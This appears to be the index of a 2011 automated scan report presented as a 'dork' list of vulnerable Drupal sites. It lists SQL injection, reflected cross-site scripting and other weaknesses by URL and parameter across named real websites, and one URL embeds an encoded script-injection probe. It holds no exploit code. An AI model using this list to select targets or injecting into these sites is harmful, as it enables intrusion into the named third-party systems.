XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, DRUPAL Sites

Comment: As of this date, all these Sites use a vulnerable version of Drupal

Report generated by XSS.CX at Mon Sep 12 12:10:13 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

1.1. http://ciphertex.com/content/product-comparison [SESSe7e1ce4917bcb7c6c1e7e1e807484f3c cookie]

1.2. http://ciphertex.com/content/product-comparison [__utma cookie]

1.3. http://www.ciphertex.com/themes/garland/minnelli/minnelli.css [REST URL parameter 1]

2. Cross-site scripting (reflected)

2.1. http://4qinvite.4q.iperceptions.com/1.aspx [loc parameter]

2.2. http://ad.yieldmanager.com/rw [name of an arbitrarily supplied request parameter]

2.3. http://ad.yieldmanager.com/rw [qs parameter]

2.4. http://ad.yieldmanager.com/rw [title parameter]

2.5. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

2.6. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

2.7. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

2.8. http://adserving.cpxinteractive.com/st [ad_size parameter]

2.9. http://adserving.cpxinteractive.com/st [pop_frequency parameter]

2.10. http://adserving.cpxinteractive.com/st [pop_times parameter]

2.11. http://adserving.cpxinteractive.com/st [section parameter]

2.12. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

2.13. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

2.14. http://api.chartbeat.com/toppages/ [jsonp parameter]

2.15. http://b.scorecardresearch.com/beacon.js [c1 parameter]

2.16. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E [callback parameter]

2.17. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/status [callback parameter]

2.18. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E [callback parameter]

2.19. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E/named_level_collection [callback parameter]

2.20. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_level_collection [callback parameter]

2.21. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E [REST URL parameter 8]

2.22. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E [callback parameter]

2.23. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

2.24. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

2.25. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [q parameter]

2.26. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [q parameter]

2.27. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]

2.28. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]

2.29. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]

2.30. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]

2.31. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js [$ parameter]

2.32. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js [q parameter]

2.33. http://choices.truste.com/ca [c parameter]

2.34. http://choices.truste.com/ca [cid parameter]

2.35. http://cm.npc-morris.overture.com/js_1_0/ [css_url parameter]

2.36. http://dailydeals.savannahnow.com/widgets/300x250 [REST URL parameter 2]

2.37. http://go.savannahnow.com/partner_json/search [jsonsp parameter]

2.38. http://go.savannahnow.com/partner_json/search [limit parameter]

2.39. http://go.savannahnow.com/partner_json/search [st parameter]

2.40. http://go.savannahnow.com/partner_json/search [when parameter]

2.41. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

2.42. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

2.43. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

2.44. http://js.revsci.net/gateway/gw.js [bpid parameter]

2.45. http://js.revsci.net/gateway/gw.js [csid parameter]

2.46. http://metrics.impactengine.com/rest/reveal/129534/5011/Expand_Content [REST URL parameter 3]

2.47. http://metrics.impactengine.com/rest/view/129534/5011/0 [REST URL parameter 3]

2.48. http://metrics.impactengine.com/rest/view/129534/5011/30 [REST URL parameter 3]

2.49. http://ms0.erovinmo.com/keywords/instrument.js [jsoncallback parameter]

2.50. http://ms4.erovinmo.com/keywords/instrument.js [jsoncallback parameter]

2.51. http://pglb.buzzfed.com/148250/91bc34b96eac101805574950b6644cc6 [callback parameter]

2.52. http://player.ooyala.com/player.js [autoplay parameter]

2.53. http://savannahnow.com/ [name of an arbitrarily supplied request parameter]

2.54. http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685 [REST URL parameter 1]

2.55. http://video.fastcompany.com/companies/mansueto-digital/videos.rss [REST URL parameter 1]

2.56. http://www.ciphertex.com/misc/favicon.ico [REST URL parameter 1]

2.57. http://www.ciphertex.com/modules/system/defaults.css [REST URL parameter 1]

2.58. http://www.ciphertex.com/modules/system/maintenance.css [REST URL parameter 1]

2.59. http://www.ciphertex.com/modules/system/system-menus.css [REST URL parameter 1]

2.60. http://www.ciphertex.com/modules/system/system-menus.css [REST URL parameter 2]

2.61. http://www.ciphertex.com/modules/system/system.css [REST URL parameter 3]

2.62. http://www.ciphertex.com/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 6]

2.63. http://www.ciphertex.com/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 7]

2.64. http://www.ciphertex.com/sites/all/modules/cck/theme/content-module.css [REST URL parameter 6]

2.65. http://www.ciphertex.com/sites/all/modules/custom_module/ciphertex.js [REST URL parameter 5]

2.66. http://www.ciphertex.com/sites/all/modules/date/date_popup/themes/jquery.timeentry.css [REST URL parameter 5]

2.67. http://www.ciphertex.com/sites/all/modules/filefield/filefield.css [REST URL parameter 4]

2.68. http://www.ciphertex.com/sites/all/modules/galleria/inc/galleria.css [REST URL parameter 1]

2.69. http://www.ciphertex.com/sites/all/modules/jquery_update/replace/jquery.min.js [REST URL parameter 1]

2.70. http://www.ciphertex.com/sites/all/modules/jquery_update/replace/jquery.min.js [REST URL parameter 6]

2.71. http://www.ciphertex.com/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 1]

2.72. http://www.ciphertex.com/sites/all/modules/print/css/printlinks.css [REST URL parameter 1]

2.73. http://www.ciphertex.com/sites/all/modules/print/css/printlinks.css [REST URL parameter 3]

2.74. http://www.ciphertex.com/sites/all/modules/print/css/printlinks.css [REST URL parameter 5]

2.75. http://www.ciphertex.com/sites/all/modules/tabs/drupal-tabs.css [REST URL parameter 1]

2.76. http://www.ciphertex.com/sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css [REST URL parameter 4]

2.77. http://www.ciphertex.com/sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css [REST URL parameter 6]

2.78. http://www.ciphertex.com/sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css [REST URL parameter 7]

2.79. http://www.ciphertex.com/sites/all/modules/ubercart/uc_attribute/uc_attribute.css [REST URL parameter 4]

2.80. http://www.ciphertex.com/sites/all/modules/ubercart/uc_order/uc_order.css [REST URL parameter 1]

2.81. http://www.ciphertex.com/sites/all/modules/ubercart/uc_order/uc_order.css [REST URL parameter 5]

2.82. http://www.ciphertex.com/sites/all/modules/ubercart/uc_product/uc_product.css [REST URL parameter 5]

2.83. http://www.ciphertex.com/sites/all/modules/views_accordion/views-accordion.css [REST URL parameter 3]

2.84. http://www.ciphertex.com/sites/default/files/banners/fose.jpg [REST URL parameter 3]

2.85. http://www.ciphertex.com/sites/default/files/banners/super_savings.jpg [REST URL parameter 3]

2.86. http://www.ciphertex.com/sites/default/files/hp.swf [REST URL parameter 1]

2.87. http://www.ciphertex.com/themes/garland/minnelli/minnelli.css [REST URL parameter 2]

2.88. http://www.ciphertex.com/themes/garland/style.css [REST URL parameter 2]

2.89. http://www.ciphertex.com/themes/garland/style.css [REST URL parameter 3]

2.90. http://www.fastcompany.com/ [name of an arbitrarily supplied request parameter]

2.91. http://www.mtv.co.uk/content/flashbox/42684-mtv-uk-homepage-615x340 [REST URL parameter 1]

2.92. http://www.mtv.co.uk/content/flashbox/42684-mtv-uk-homepage-615x340 [REST URL parameter 2]

2.93. http://www.mtv.co.uk/content/flashbox/42684-mtv-uk-homepage-615x340 [REST URL parameter 3]

2.94. http://www.mtv.co.uk/files/favicon.ico [REST URL parameter 1]

2.95. http://www.mtv.co.uk/files/favicon.ico [REST URL parameter 2]

2.96. http://www.mtv.co.uk/misc/thickbox.css [REST URL parameter 2]

2.97. http://www.mtv.co.uk/modules/node/node.css [REST URL parameter 3]

2.98. http://www.mtv.co.uk/modules/system/defaults.css [REST URL parameter 3]

2.99. http://www.mtv.co.uk/modules/system/system.css [REST URL parameter 3]

2.100. http://www.mtv.co.uk/modules/user/user.css [REST URL parameter 3]

2.101. http://www.mtv.co.uk/sites/all/modules/cck/content.css [REST URL parameter 5]

2.102. http://www.mtv.co.uk/sites/all/modules/fckeditor/fckeditor.css [REST URL parameter 5]

2.103. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 1]

2.104. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 2]

2.105. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 3]

2.106. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 4]

2.107. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 5]

2.108. http://www.mtv.co.uk/sites/all/modules/mtv_videobrowse/mtv_videobrowse.css [REST URL parameter 5]

2.109. http://www.mtv.co.uk/sites/all/modules/nice_menus/nice_menus.css [REST URL parameter 5]

2.110. http://www.mtv.co.uk/sites/all/modules/nice_menus/nice_menus_default.css [REST URL parameter 5]

2.111. http://www.mtv.co.uk/sites/all/modules/top_tabs/top_tabs.css [REST URL parameter 5]

2.112. http://www.mtv.co.uk/sites/all/modules/user_optin/user_optin.css [REST URL parameter 5]

2.113. http://www.mtv.co.uk/sites/all/themes/mtvuk/blueprint/blueprint/print.css [REST URL parameter 7]

2.114. http://www.mtv.co.uk/sites/all/themes/mtvuk/blueprint/blueprint/screen.css [REST URL parameter 7]

2.115. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf [REST URL parameter 6]

2.116. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/blackberry.swf [REST URL parameter 6]

2.117. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/bodyform.swf [REST URL parameter 6]

2.118. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/nokiaSessions.swf [REST URL parameter 6]

2.119. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/seat.swf [REST URL parameter 6]

2.120. http://www.mtv.co.uk/sites/all/themes/mtvuk/subthemes/default_homepage/style.css [REST URL parameter 7]

2.121. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php [REST URL parameter 3]

2.122. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php [REST URL parameter 3]

2.123. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 1]

2.124. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 1]

2.125. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 2]

2.126. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 2]

2.127. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 3]

2.128. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 3]

2.129. http://www.onsugar.com/static/ck.php [REST URL parameter 2]

2.130. http://www.onsugar.com/static/ck.php [REST URL parameter 2]

2.131. http://www.popsugar.com/ajaxharness [REST URL parameter 1]

2.132. http://www.popsugar.com/ajaxharness [REST URL parameter 1]

2.133. http://www.popsugar.com/community/welcome [REST URL parameter 1]

2.134. http://www.popsugar.com/community/welcome [REST URL parameter 1]

2.135. http://www.popsugar.com/community/welcome [REST URL parameter 2]

2.136. http://www.popsugar.com/community/welcome [REST URL parameter 2]

2.137. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 2]

2.138. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 3]

2.139. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 4]

2.140. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 5]

2.141. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 6]

2.142. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 7]

2.143. http://adserving.cpxinteractive.com/st [Referer HTTP header]

2.144. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [ZEDOIDA cookie]

2.145. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js [ZEDOIDA cookie]

3. Cleartext submission of password

3.1. http://www.digitaldollhouse.com/

3.2. http://www.digitaldollhouse.com/

3.3. http://www.fastcompany.com/

3.4. http://www.fastcompany.com/

3.5. http://www.nowpublic.com/

4. Session token in URL

4.1. http://bh.contextweb.com/bh/set.aspx

4.2. http://l.sharethis.com/pview

4.3. http://video.fastcompany.com/manifests/companies/mansueto-digital/videos.rss/8516eaf70522ed9dcc26b0815a85ef0c-fc_playlist_homepage.txt

4.4. http://video.fastcompany.com/plugins/flowplayer.swf

4.5. http://www.facebook.com/extern/login_status.php

4.6. http://www.fastcompany.com/

5. Cookie without HttpOnly flag set

5.1. http://teamsugar.com/

5.2. http://a.tribalfusion.com/j.ad

5.3. http://a.visualrevenue.com/vr.js

5.4. http://ad.yieldmanager.com/iframe3

5.5. http://ad.yieldmanager.com/imp

5.6. http://ad.yieldmanager.com/pixel

5.7. http://ads.pointroll.com/PortalServe/

5.8. http://affiliates.lynda.com/42/510/50/

5.9. http://api.bizographics.com/v1/profile.redirect

5.10. http://apis.google.com/js/plusone.js

5.11. http://b.scorecardresearch.com/b

5.12. http://bh.contextweb.com/bh/set.aspx

5.13. http://btg.mtvnservices.com/aria/guid.html

5.14. http://c.statcounter.com/t.php

5.15. http://c13.statcounter.com/t.php

5.16. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

5.17. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

5.18. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

5.19. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js

5.20. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js

5.21. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js

5.22. http://c7.zedo.com/utils/ecSet.js

5.23. http://cm.npc-morris.overture.com/js_1_0/

5.24. http://counters.gigya.com/wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif

5.25. http://d.adroll.com/check/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7/W6PQDSP73NHORGHG2INGBI

5.26. http://d.adroll.com/pixel/PDI57P5745CUFB7MJVH7MR/IQS2RR66HJBRNJLAASZYZ7

5.27. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js

5.28. http://d7.zedo.com/img/bh.gif

5.29. http://d7.zedo.com/utils/ecSet.js

5.30. http://dts1.raasnet.com/dts/bizo/in

5.31. http://dts1.raasnet.com/dts/exelate/in

5.32. http://dts1.raasnet.com/dts/targus

5.33. http://f21.360tag.com/t6/1418/MTV/

5.34. http://image2.pubmatic.com/AdServer/Pug

5.35. http://imp.fetchback.com/serve/fb/adtag.js

5.36. http://imp.fetchback.com/serve/fb/imp

5.37. http://load.exelator.com/load/

5.38. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s72097517517395

5.39. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s83483789157502

5.40. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s86790688387118

5.41. http://p.raasnet.com/partners/dfp

5.42. http://p.raasnet.com/partners/oxmap

5.43. http://p.raasnet.com/partners/pixel

5.44. http://p.raasnet.com/partners/universal/in

5.45. http://pixel.quantserve.com/api/segments.json

5.46. http://pixel.quantserve.com/pixel

5.47. http://pixel.rubiconproject.com/tap.php

5.48. http://rs.gwallet.com/r1/pixel/x420r5075003

5.49. http://usadmm.dotomi.com/dmm/servlet/dmm

5.50. http://viamtvuk.112.2o7.net/b/ss/viamtvuk/1/H.22.1/s71862144072074

5.51. http://viamtvuk.112.2o7.net/b/ss/viamtvuk/1/H.22.1/s88215071307387

6. Password field with autocomplete enabled

6.1. http://www.digitaldollhouse.com/

6.2. http://www.digitaldollhouse.com/

6.3. http://www.fastcompany.com/

6.4. http://www.fastcompany.com/

6.5. http://www.nowpublic.com/

7. Source code disclosure

8. Referer-dependent response

8.1. http://adserving.cpxinteractive.com/st

8.2. http://www.examiner.com/sites/all/modules/custom/pajito/widget/content/widget.js.php

9. Cross-domain POST

9.1. http://savannahnow.com/

9.2. http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685

9.3. http://www.popsci.com/

10. Cookie scoped to parent domain

10.1. http://a.tribalfusion.com/j.ad

10.2. http://ads.pointroll.com/PortalServe/

10.3. http://api.bizographics.com/v1/profile.redirect

10.4. http://apis.google.com/js/plusone.js

10.5. http://b.scorecardresearch.com/b

10.6. http://bh.contextweb.com/bh/set.aspx

10.7. http://c.statcounter.com/t.php

10.8. http://c13.statcounter.com/t.php

10.9. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

10.10. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

10.11. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

10.12. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js

10.13. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js

10.14. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js

10.15. http://c7.zedo.com/utils/ecSet.js

10.16. http://cm.npc-morris.overture.com/js_1_0/

10.17. http://counters.gigya.com/wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif

10.18. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js

10.19. http://d7.zedo.com/img/bh.gif

10.20. http://d7.zedo.com/utils/ecSet.js

10.21. http://dts1.raasnet.com/dts/bizo/in

10.22. http://dts1.raasnet.com/dts/exelate/in

10.23. http://dts1.raasnet.com/dts/targus

10.24. http://f21.360tag.com/t6/1418/MTV/

10.25. http://id.google.com/verify/EAAAABWZtieoFhZd9XdhbVhtYuQ.gif

10.26. http://id.google.com/verify/EAAAAM9br7WwFClt2Y62Ukg62vk.gif

10.27. http://image2.pubmatic.com/AdServer/Pug

10.28. http://imp.fetchback.com/serve/fb/adtag.js

10.29. http://imp.fetchback.com/serve/fb/imp

10.30. http://load.exelator.com/load/

10.31. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s72097517517395

10.32. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s83483789157502

10.33. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s86790688387118

10.34. http://p.raasnet.com/partners/dfp

10.35. http://p.raasnet.com/partners/oxmap

10.36. http://p.raasnet.com/partners/pixel

10.37. http://p.raasnet.com/partners/universal/in

10.38. http://pixel.quantserve.com/api/segments.json

10.39. http://pixel.quantserve.com/pixel

10.40. http://pixel.rubiconproject.com/tap.php

10.41. http://rs.gwallet.com/r1/pixel/x420r5075003

10.42. http://usadmm.dotomi.com/dmm/servlet/dmm

10.43. http://viamtvuk.112.2o7.net/b/ss/viamtvuk/1/H.22.1/s71862144072074

10.44. http://viamtvuk.112.2o7.net/b/ss/viamtvuk/1/H.22.1/s88215071307387

11. Cross-domain Referer leakage

11.1. http://ad.doubleclick.net/adi/cdg.NowPublic.Home

11.2. http://ad.doubleclick.net/adi/cdg.NowPublic.Home

11.3. http://ad.doubleclick.net/adi/cdg.NowPublic.Home

11.4. http://ad.doubleclick.net/adi/cdg.NowPublic.Home

11.5. http://ad.doubleclick.net/adi/cdg.NowPublic.Home

11.6. http://ad.doubleclick.net/adj/mansueto.fc/homepage

11.7. http://ad.doubleclick.net/adj/mansueto.fc/homepage

11.8. http://ad.doubleclick.net/adj/mansueto.fc/homepage

11.9. http://ad.doubleclick.net/adj/mansueto.fc/homepage

11.10. http://ad.doubleclick.net/adj/mansueto.fc/homepage

11.11. http://ad.doubleclick.net/adj/mansueto.fc/homepage

11.12. http://ad.doubleclick.net/adj/n6747.popsci/home

11.13. http://ad.doubleclick.net/adj/n6747.popsci/home

11.14. http://ad.doubleclick.net/adj/n6747.popsci/home

11.15. http://ad.doubleclick.net/adj/n6747.popsci/home

11.16. http://ad.doubleclick.net/adj/n6747.popsci/home

11.17. http://ad.doubleclick.net/adj/n6747.popsci/home

11.18. http://ad.doubleclick.net/adj/uk.mtv/homepage

11.19. http://ad.doubleclick.net/adj/uk.mtv/homepage

11.20. http://ad.yieldmanager.com/iframe3

11.21. http://ads.bluelithium.com/st

11.22. http://ads.dotomi.com/ads_smokey_pure.php

11.23. http://ads.dotomi.com/ads_smokey_pure.php

11.24. http://ads.pointroll.com/PortalServe/

11.25. http://adunit.cdn.auditude.com/flash/modules/display/auditudeDisplayLib.js

11.26. http://btg.mtvnservices.com/aria/coda.html

11.27. http://choices.truste.com/ca

11.28. http://choices.truste.com/ca

11.29. http://cm.g.doubleclick.net/pixel

11.30. http://cm.g.doubleclick.net/pixel

11.31. http://cm.npc-morris.overture.com/js_1_0/

11.32. http://googleads.g.doubleclick.net/pagead/ads

11.33. http://googleads.g.doubleclick.net/pagead/ads

11.34. http://googleads.g.doubleclick.net/pagead/ads

11.35. http://googleads.g.doubleclick.net/pagead/ads

11.36. http://googleads.g.doubleclick.net/pagead/ads

11.37. http://l.yimg.com/zz/combo

11.38. http://p.raasnet.com/partners/universal/in

11.39. http://player.ooyala.com/player.js

11.40. http://player.popsugar.com/player.js

11.41. http://player.vimeo.com/video/19872101

11.42. http://seg.sharethis.com/getSegment.php

11.43. http://syndication.jobthread.com/jt/syndication/page.php

11.44. http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737

11.45. http://view.atdmt.com/CNT/iview/334302974/direct/01/4245069

11.46. http://www.facebook.com/plugins/likebox.php

11.47. http://www.facebook.com/plugins/likebox.php

11.48. http://www.facebook.com/plugins/likebox.php

11.49. http://www.facebook.com/plugins/likebox.php

11.50. http://www.facebook.com/plugins/likebox.php

11.51. http://www.facebook.com/plugins/likebox.php

11.52. http://www.facebook.com/plugins/likebox.php

11.53. http://www.facebook.com/plugins/likebox.php

11.54. http://www.facebook.com/plugins/likebox.php

11.55. http://www.facebook.com/plugins/likebox.php

11.56. http://www.facebook.com/plugins/likebox.php

11.57. http://www.google.com/search

11.58. http://www.google.com/url

11.59. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

12. Cross-domain script include

12.1. http://67.23.1.124/omni/cdcc_mandelbrot_min_2.html

12.2. http://ad.doubleclick.net/adi/cdg.NowPublic.Home

12.3. http://ad.doubleclick.net/adi/cdg.NowPublic.Home

12.4. http://ad.yieldmanager.com/iframe3

12.5. http://advertising.yahoo.com/

12.6. http://drupalsn.com/

12.7. http://googleads.g.doubleclick.net/pagead/ads

12.8. http://mydirtbike.com/

12.9. http://player.vimeo.com/video/19872101

12.10. http://research.yahoo.com/

12.11. http://savannahnow.com/

12.12. http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685

12.13. http://seg.sharethis.com/getSegment.php

12.14. http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737

12.15. http://view.atdmt.com/CNT/iview/334302974/direct/01/4245069

12.16. http://widget.newsinc.com/_fw/Savannah/toppicks_savannah_top.html

12.17. http://www.digitaldollhouse.com/

12.18. http://www.dome9.com/

12.19. http://www.facebook.com/plugins/likebox.php

12.20. http://www.fastcompany.com/

12.21. http://www.mtv.co.uk/

12.22. http://www.nowpublic.com/

12.23. http://www.observer.com/

12.24. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php

12.25. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

12.26. http://www.popsci.com/

12.27. http://www.popsugar.com/community/welcome

12.28. http://www.symantec.com/connect/

13. Email addresses disclosed

13.1. http://drupal.org/node/101494

13.2. http://drupal.org/search/apachesolr_multisitesearch/xss%20sql%20injection

13.3. http://drupal.org/security-team

13.4. http://media26.onsugar.com/v645/static/js/scriptaculous-1.8.3/controls.js

13.5. http://mydirtbike.com/sites/all/libraries/colorbox/colorbox/jquery.colorbox-min.js

13.6. http://research.yahoo.com/themes/yresearch/style-1.1.css

13.7. http://research.yahoo.com/themes/yresearch/style_drupal.css

13.8. http://research.yahoo.com/themes/yresearch/style_edits-1.4.css

13.9. http://savannahnow.com/sites/default/files/js/js_20f1b99cfdc38a8ea7818ec0c877dbfe.js

13.10. http://static.nowpublic.net/sf_js/core_bc99f0856175_190.js

13.11. http://static.nowpublic.net/sf_js/fp_9668f20645c9_190.js

13.12. http://video.fastcompany.com/companies/mansueto-digital/videos.rss

13.13. http://w.sharethis.com/button/buttons.js

13.14. http://www.cargoh.com/sites/default/files/js/js_8a98a7cc05aa129e3debc64b291aa431.js

13.15. http://www.mtv.co.uk/misc/jquery-ui.min.js

13.16. http://www.observer.com/

13.17. http://www.popsci.com/

13.18. http://www.popsci.com/files/js/220b385f427499380964507975f14862.js

13.19. http://www.popsugar.com/ajaxharness

13.20. http://www.symantec.com/connect/

14. Private IP addresses disclosed

14.1. http://api.connect.facebook.com/static/v0.4/client_restserver.php

14.2. http://connect.facebook.net/en_US/all.js

14.3. http://connect.facebook.net/en_US/all.js

14.4. http://external.ak.fbcdn.net/safe_image.php

14.5. http://external.ak.fbcdn.net/safe_image.php

14.6. http://player.vimeo.com/video/19872101

14.7. http://static.ak.connect.facebook.com/connect.php

14.8. http://static.ak.connect.facebook.com/connect.php/en_US

14.9. http://static.ak.connect.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

14.10. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

14.11. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

14.12. http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

14.13. http://www.facebook.com/ajax/connect/connect_widget.php

14.14. http://www.facebook.com/ajax/connect/connect_widget.php

14.15. http://www.facebook.com/ajax/connect/connect_widget.php

14.16. http://www.facebook.com/ajax/connect/connect_widget.php

14.17. http://www.facebook.com/ajax/connect/connect_widget.php

14.18. http://www.facebook.com/connect.php/js/FB.Share

14.19. http://www.facebook.com/extern/login_status.php

14.20. http://www.facebook.com/extern/login_status.php

14.21. http://www.facebook.com/extern/login_status.php

14.22. http://www.facebook.com/extern/login_status.php

14.23. http://www.facebook.com/extern/login_status.php

14.24. http://www.facebook.com/plugins/like.php

14.25. http://www.facebook.com/plugins/like.php

14.26. http://www.facebook.com/plugins/likebox.php

14.27. http://www.facebook.com/plugins/likebox.php

14.28. http://www.facebook.com/plugins/likebox.php

14.29. http://www.facebook.com/plugins/likebox.php

14.30. http://www.facebook.com/plugins/likebox.php

14.31. http://www.facebook.com/plugins/likebox.php

14.32. http://www.facebook.com/plugins/likebox.php

14.33. http://www.facebook.com/plugins/likebox.php

14.34. http://www.facebook.com/plugins/likebox.php

14.35. http://www.facebook.com/plugins/likebox.php

14.36. http://www.facebook.com/plugins/likebox.php

14.37. http://www.facebook.com/plugins/likebox.php

15. Credit card numbers disclosed

15.1. http://assets.newsinc.com/flash/widget_toppicks01ps2.xml

15.2. http://www.digitaldollhouse.com/

16. HTML does not specify charset

16.1. http://67.23.1.124/omni/cdcc_mandelbrot_min_2.html

16.2. http://ad.yieldmanager.com/iframe3

16.3. http://ad.yieldmanager.com/rw

16.4. http://ads.pointroll.com/PortalServe/

16.5. http://amch.questionmarket.com/adsc/d907755/101/908678/adscout.php

